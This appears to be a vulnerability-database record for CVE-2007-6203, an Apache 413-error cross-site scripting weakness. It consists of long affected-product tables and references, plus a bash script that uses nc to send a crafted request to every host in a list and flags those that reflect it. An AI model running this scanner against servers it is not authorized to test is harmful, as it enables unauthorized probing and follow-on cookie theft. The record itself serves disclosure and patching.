ID
VAR-E-200711-0281
CVE
| cve_id: | CVE-2007-6203 | Trust: 1.9 |
EDB ID
30835
TITLE
Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting - Unix remote Exploit
Trust: 0.6
DESCRIPTION
Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting. CVE-2007-6203CVE-39003 . remote exploit for Unix platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | apache | model: | - | scope: | eq | version: | 2.2.4 | Trust: 1.0 |
| vendor: | hp | model: | hp-ux b.11.31 | scope: | - | version: | - | Trust: 0.6 |
| vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.6 |
| vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 8.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 8.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts lpia | scope: | eq | version: | 8.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 8.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 8.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 7.10 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 7.10 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lpia | scope: | eq | version: | 7.10 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 7.10 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 7.10 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 6.06 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 6.06 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 6.06 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 6.06 | Trust: 0.3 |
| vendor: | turbolinux | model: | server | scope: | eq | version: | 10.0 | Trust: 0.3 |
| vendor: | turbolinux | model: | server | scope: | eq | version: | 11x64 | Trust: 0.3 |
| vendor: | turbolinux | model: | server | scope: | eq | version: | 11 | Trust: 0.3 |
| vendor: | turbolinux | model: | server | scope: | eq | version: | 10.0.0x64 | Trust: 0.3 |
| vendor: | turbolinux | model: | personal | scope: | - | version: | - | Trust: 0.3 |
| vendor: | turbolinux | model: | multimedia | scope: | - | version: | - | Trust: 0.3 |
| vendor: | turbolinux | model: | fuji | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | turbolinux | model: | appliance server | scope: | eq | version: | 2.0 | Trust: 0.3 |
| vendor: | suse | model: | linux enterprise server | scope: | eq | version: | 9 | Trust: 0.3 |
| vendor: | suse | model: | linux enterprise server sp1 | scope: | eq | version: | 10 | Trust: 0.3 |
| vendor: | suse | model: | linux enterprise sdk 10.sp1 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | suse | model: | opensuse | scope: | eq | version: | 10.3 | Trust: 0.3 |
| vendor: | s u s e | model: | opensuse | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | s u s e | model: | open-enterprise-server | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | s u s e | model: | novell linux pos | scope: | eq | version: | 9 | Trust: 0.3 |
| vendor: | s u s e | model: | novell linux desktop sdk | scope: | eq | version: | 9.0 | Trust: 0.3 |
| vendor: | s u s e | model: | novell linux desktop | scope: | eq | version: | 9.0 | Trust: 0.3 |
| vendor: | s u s e | model: | linux | scope: | eq | version: | 10.1x86-64 | Trust: 0.3 |
| vendor: | s u s e | model: | linux | scope: | eq | version: | 10.1x86 | Trust: 0.3 |
| vendor: | s u s e | model: | linux ppc | scope: | eq | version: | 10.1 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.15 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.27 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.13 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.47.1 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.0.13 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.0.1 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.0 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.23 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.19 | Trust: 0.3 |
| vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.12 | Trust: 0.3 |
| vendor: | ibm | model: | hardware management console for pseries r1.3 | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | ibm | model: | hardware management console for iseries r1.3 | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | hp | model: | hp-ux b.11.23 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage job workload server | scope: | eq | version: | 8.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage apworks modelers-j edition 6.0a | scope: | - | version: | - | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server web-j edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server standard edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition a | scope: | eq | version: | 9.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | apple | model: | mac os server | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os server | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os server | scope: | eq | version: | x10.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.8 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.7 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.6 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.5 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.59 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.58 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.55 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.54 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.53 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.52 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.51 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.50 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.49 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.48 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.46 | Trust: 0.3 |
| vendor: | apache | model: | software foundation apache | scope: | ne | version: | 2.2.8 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/26663/info
Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected.
#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi
for i in `cat $1`
do
if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
-i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi
done
Trust: 1.0
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
413 Error HTTP Request Method Cross-Site Scripting
Trust: 1.0
CREDITS
Adrian Pastor
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 30835 | Trust: 1.9 |
| db: | NVD | id: | CVE-2007-6203 | Trust: 1.9 |
| db: | BID | id: | 26663 | Trust: 1.9 |
| db: | EDBNET | id: | 52455 | Trust: 0.6 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2007-6203 | Trust: 1.6 |
| url: | https://www.securityfocus.com/bid/26663/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/30835/ | Trust: 0.6 |
| url: | http://www-1.ibm.com/support/docview.wss?uid=swg1pk57952 | Trust: 0.3 |
| url: | http://issues.apache.org/bugzilla/show_bug.cgi?id=44014 | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/30835 | Trust: 0.3 |
| url: | http://www.apache.org/dist/httpd/changes_2.2.8 | Trust: 0.3 |
| url: | https://www14.software.ibm.com/webapp/set2/sas/f/hmc/power5/install/v61.readme.html#mh01110 | Trust: 0.3 |
| url: | http://www.fujitsu.com/global/support/software/security/products-f/interstage-200807e.html | Trust: 0.3 |
| url: | http://www-1.ibm.com/support/docview.wss?uid=swg24019245 | Trust: 0.3 |
| url: | http://httpd.apache.org/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 26663 |
| db: | EXPLOIT-DB | id: | 30835 |
| db: | EDBNET | id: | 52455 |
LAST UPDATE DATE
2022-07-27T10:02:01.375000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 26663 | date: | 2014-02-11T00:26:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 26663 | date: | 2007-11-30T00:00:00 |
| db: | EXPLOIT-DB | id: | 30835 | date: | 2007-11-30T00:00:00 |
| db: | EDBNET | id: | 52455 | date: | 2007-11-30T00:00:00 |